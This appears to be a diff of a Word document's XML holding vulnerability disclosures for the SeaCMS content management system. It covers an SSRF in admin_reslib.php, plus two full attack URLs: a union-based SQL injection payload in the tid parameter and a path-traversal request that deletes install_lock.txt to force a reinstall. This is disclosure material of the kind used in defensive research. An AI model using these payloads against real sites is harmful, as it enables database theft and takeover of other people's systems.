+  <w:style w:type="character" w:styleId="a8">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D05830"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>

--- a/seacms.docx
+++ b/seacms.docx
@@ -517,54 +517,276 @@
       <w:r>
         <w:t>3</w:t>
       </w:r>
+      <w:r>
+        <w:t>.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sea</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cms</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_reslib.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> has an SSRF vulnerability. The attacker is allowed to initiate a request to the intranet host, obtain the banner information of the web application reachable server service, and collect the fingerprint identification of the intranet web application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">After the admin logged </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>in,visit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/seacms/adm1n/admin_topic_vod.php?tid=-1%20union%20select%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))),2,3,4,5,6,7,8,9</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">he current user of the database is obtained through SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>injection.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">An issue was discovered in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>seacms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> through </w:t>
+      </w:r>
+      <w:r>
+        <w:t>V6.61</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. SQL injection exists via the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parameter in an </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>admin_topic_vod.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>request.</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:t>.md)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sea</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cms</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> adm1n/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>admin_reslib.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> has an SSRF vulnerability. The attacker is allowed to initiate a request to the intranet host, obtain the banner information of the web application reachable server service, and collect the fingerprint identification of the intranet web application.</w:t>
-      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/seacms.docx
+++ b/seacms.docx
@@ -646,10 +646,262 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">An issue was discovered in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>seacms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> through </w:t>
+      </w:r>
+      <w:r>
+        <w:t>V6.61</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. SQL injection exists via the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parameter in an </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>admin_topic_vod.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>request.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Arbitrary file deletion</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">After the admin logged </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>in,visit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>http://127.0.0.1/seacms/adm1n/admin_database.php?action=redat&amp;delfile=1&amp;redStruct=1&amp;bakfiles=/../../../install/install_lock.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the lock file install_lock.txt is deleted</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
@@ -689,29 +941,8 @@
           <w:sz w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. SQL injection exists via the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>tid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> parameter in an </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
@@ -729,44 +960,64 @@
           <w:sz w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>admin_topic_vod.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>admin_database.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> allows remote attackers to delete arbitrary files via directory traversal sequences in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bakfiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>?</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>tid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>parameter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>This will cause the system to reinstall</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -784,9 +1035,26 @@
           <w:sz w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>request.</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
+        <w:t xml:space="preserve">by deleting </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>install_lock.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -1230,7 +1498,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="009537DD"/>
+    <w:rsid w:val="00D328DB"/>
     <w:pPr>
       <w:widowControl w:val="0"/>
       <w:jc w:val="both"/>
